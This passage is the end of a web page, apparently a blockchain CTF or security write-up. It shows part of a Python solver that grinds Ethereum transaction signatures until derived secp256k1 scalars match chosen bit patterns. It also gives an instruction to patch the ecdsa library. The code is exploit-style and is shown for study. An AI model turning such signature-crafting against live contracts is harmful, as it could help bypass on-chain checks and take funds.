            scalar1 <span class="token operator">=</span> <span class="token punctuation">(</span>SECP256k1<span class="token punctuation">.</span>order <span class="token operator">-</span> <span class="token punctuation">(</span>transaction_number <span class="token operator">*</span> inverse_r<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">%</span> SECP256k1<span class="token punctuation">.</span>order
            scalar2 <span class="token operator">=</span> <span class="token punctuation">(</span>inverse_r <span class="token operator">*</span> sig<span class="token punctuation">.</span>s<span class="token punctuation">)</span> <span class="token operator">%</span> SECP256k1<span class="token punctuation">.</span>order
            
            <span class="token keyword">if</span> get_leading_bits<span class="token punctuation">(</span>scalar1<span class="token punctuation">)</span> <span class="token operator">!=</span> <span class="token string">&quot;10&quot;</span><span class="token punctuation">:</span>
                value <span class="token operator">+=</span> <span class="token number">1</span>
                <span class="token keyword">continue</span>
            <span class="token keyword">if</span> get_leading_bits<span class="token punctuation">(</span>scalar2<span class="token punctuation">)</span> <span class="token operator">!=</span> <span class="token string">&quot;01&quot;</span><span class="token punctuation">:</span>
                value <span class="token operator">+=</span> <span class="token number">1</span>
                <span class="token keyword">continue</span>

            <span class="token keyword">if</span> sig<span class="token punctuation">.</span>s <span class="token operator">&gt;</span> SECP256k1<span class="token punctuation">.</span>order <span class="token operator">/</span> <span class="token number">2</span><span class="token punctuation">:</span>
                value <span class="token operator">+=</span> <span class="token number">1</span>
                <span class="token keyword">continue</span>
            
            encoded_transaction <span class="token operator">=</span> encode_transaction<span class="token punctuation">(</span>unsigned_transaction<span class="token punctuation">,</span> vrs<span class="token operator">=</span><span class="token punctuation">(</span>v<span class="token punctuation">,</span> sig<span class="token punctuation">.</span>r<span class="token punctuation">,</span> sig<span class="token punctuation">.</span>s<span class="token punctuation">)</span><span class="token punctuation">)</span>
            <span class="token comment">#txn_hash = w3.eth.send_raw_transaction(HexBytes(encoded_transaction))</span>
            
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;#########################&quot;</span><span class="token punctuation">)</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;scalar1: &quot;</span><span class="token punctuation">,</span> scalar1<span class="token punctuation">)</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;scalar2: &quot;</span><span class="token punctuation">,</span> scalar2<span class="token punctuation">)</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;sig.r: &quot;</span><span class="token punctuation">,</span> sig<span class="token punctuation">.</span>r<span class="token punctuation">)</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;sig.s: &quot;</span><span class="token punctuation">,</span> sig<span class="token punctuation">.</span>s<span class="token punctuation">)</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;sig.v: &quot;</span><span class="token punctuation">,</span> v<span class="token punctuation">)</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;txhash: &quot;</span><span class="token punctuation">,</span> transaction_number<span class="token punctuation">)</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;#########################&quot;</span><span class="token punctuation">)</span>
            calculate<span class="token punctuation">(</span>scalar1<span class="token punctuation">,</span> scalar2<span class="token punctuation">,</span> k<span class="token punctuation">)</span>

            <span class="token keyword">break</span>

        <span class="token keyword">except</span> Exception <span class="token keyword">as</span> e<span class="token punctuation">:</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;An error occurred:&quot;</span><span class="token punctuation">,</span> e<span class="token punctuation">)</span>
            value <span class="token operator">+=</span> <span class="token number">1</span>

<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">&quot;__main__&quot;</span><span class="token punctuation">:</span>
    main<span class="token punctuation">(</span><span class="token punctuation">)</span>
</code></pre></div><p>To make the above code work you need to modify the ecsda library and add the get_coords function to it.</p> <div class="language-python extra-class"><pre class="language-python"><code><span class="token keyword">class</span> <span class="token class-name">PointJacobi</span><span class="token punctuation">(</span>AbstractPoint<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token triple-quoted-string string">&quot;&quot;&quot;
    Point on a short Weierstrass elliptic curve. Uses Jacobi coordinates.

    In Jacobian coordinates, there are three parameters, X, Y and Z.
    They correspond to affine parameters 'x' and 'y' like so:

    x = X / Z²
    y = Y / Z³
    &quot;&quot;&quot;</span>
    <span class="token keyword">def</span> <span class="token function">get_coords</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">return</span> self<span class="token punctuation">.</span>__coords
</code></pre></div></div> <footer class="page-edit"><!----> <!----></footer> <!----> </main></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.0f57a21d.js" defer></script><script src="/assets/js/2.9c3d16e9.js" defer></script><script src="/assets/js/1.ae13b9d5.js" defer></script><script src="/assets/js/30.00564173.js" defer></script>
  </body>
</html>
